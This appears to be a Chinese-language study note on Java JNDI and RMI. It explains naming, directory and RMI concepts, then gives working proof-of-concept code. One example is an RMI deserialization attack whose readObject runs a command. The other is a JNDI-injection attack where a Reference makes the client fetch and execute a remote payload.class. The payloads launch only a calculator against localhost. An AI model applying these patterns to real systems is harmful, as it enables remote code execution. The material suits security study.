目录

JNDI

RMI

基本概念

RMI 基本逻辑

恶意利用

JNDI注入+RMI实现攻击

---

JNDI

Java Naming and Directory Interface  Java 命令和目录接口

让配置参数 和  代码 解耦的规范或者思想

低耦合 高内聚

Name
命名  

java对象 通过 命名  绑定到 容器环境

java对象和一个特定的名称关联在一起

Directory

将一个对象的所有属性信息保存在一个容器环境

RMI

基本概念

Remote Method Invocation  Java远程方法调用

实现java程序之间jvm的远程通信

例子

某个负责计算   1台计算机  需要很久   如果这台计算机支持 RMI调用，那么它可以把任务分配和远程的多台虚拟机 进行同步计算，提高计算效率

RMI 基本逻辑

分为三部分   Server  Client  Registry

Server  提供远程的对象
Client 调用远程的对象
Registry 注册表 存放远程对象的位置  ip 端口  标识符

恶意利用

客户端 通过 lookup方法，找绑定的恶意类

1 远程对象有恶意方法，可以直接调用
2 远程对象有可利用的readObject 方法，可以传输Object参数，实现反序列化攻击

举例：

package org.example;import java.io.IOException;
import java.io.ObjectInputStream;
import java.io.Serializable;public class Exp implements Serializable {private void readObject(ObjectInputStream objectInputStream) throws IOException, ClassNotFoundException {objectInputStream.defaultReadObject();Runtime.getRuntime().exec("calc");}}

package org.example;import java.io.IOException;
import java.rmi.NotBoundException;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;public class RMIClient {public static void main(String[] args) throws IOException, NotBoundException {Registry registry = LocateRegistry.getRegistry("localhost", 8081);RMITest rmiTest = (RMITest) registry.lookup("Z3r4y");rmiTest.ctfshow(new Exp());}
}

package org.example;import java.rmi.AlreadyBoundException;
import java.rmi.RemoteException;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;public class RMIServer {public static void main(String[] args) throws RemoteException, AlreadyBoundException {RMITestmpl rmiTest = new RMITestmpl();Registry registry = LocateRegistry.createRegistry(8081);registry.bind("Z3r4y",rmiTest);System.out.println("RMI Server is listening ...");}
}

package org.example;import java.io.IOException;
import java.rmi.Remote;
import java.rmi.RemoteException;public interface RMITest extends Remote {public String testcalc() throws IOException;public void ctfshow(Object obj) throws RemoteException;
}

package org.example;import java.io.IOException;
import java.rmi.RemoteException;
import java.rmi.server.UnicastRemoteObject;public class RMITestmpl extends UnicastRemoteObject implements RMITest{protected RMITestmpl() throws RemoteException {}@Overridepublic String testcalc() throws IOException {Runtime.getRuntime().exec("calc");return null;}@Overridepublic void ctfshow(Object obj) {System.out.println(obj);}
}

开客户端和服务端就可以成功弹计算器

JNDI注入+RMI实现攻击

package org.example;import java.io.IOException;public class payload {static {try {Runtime.getRuntime().exec("calc");} catch (IOException e) {throw new RuntimeException(e);}}
}

package org.example;import javax.naming.Context;
import javax.naming.InitialContext;
import javax.naming.NamingException;
import java.io.IOException;
import java.rmi.NotBoundException;
import java.util.Hashtable;public class RMIClient {public static void main(String[] args) throws IOException, NotBoundException, NamingException {System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase","true");System.setProperty("com.sun.jndi.rmi.ldap.object.trustURLCodebase","true");Hashtable env=new Hashtable();env.put(Context.INITIAL_CONTEXT_FACTORY,"com.sun.jndi.registry.RegistryContextFactory");env.put(Context.PROVIDER_URL,"rmi://localhost:8081");InitialContext context = new InitialContext(env);String url="rmi://localhost:8081/Z3r4y";context.lookup(url);}
}

package org.example;import com.sun.jndi.rmi.registry.ReferenceWrapper;import javax.naming.NamingException;
import javax.naming.Reference;
import java.rmi.AlreadyBoundException;
import java.rmi.RemoteException;
import java.rmi.registry.LocateRegistry;
import java.rmi.registry.Registry;public class RMIServer {public static void main(String[] args) throws RemoteException, AlreadyBoundException, NamingException {Registry registry = LocateRegistry.createRegistry(8081);System.setProperty("com.sun.jndi.rmi.object.trustURLCodebase","true");Reference reference=new Reference("payload","payload","http://localhost/");ReferenceWrapper referenceWrapper=new ReferenceWrapper(reference);registry.bind("Z3r4y",referenceWrapper);System.out.println("RMI Server is listening ...");}
}

客户端  通过 lookup 方法  注入了rmi协议  ，访问了远程的rmi服务器

rmi服务器返回了引用对象 ，而引用对象包含了类的加载工厂

如果本地没有这个类 ，就去加载工厂去加载类的字节码

而加载工厂是本地的localhost80端口，目录下，有payload.class文件

客户端 再去访问localhost的80端口，去下载payload.class的字节码 ，然后Class.forname加载了这个字节码

造成了payload.class这个类里面的静态代码被执行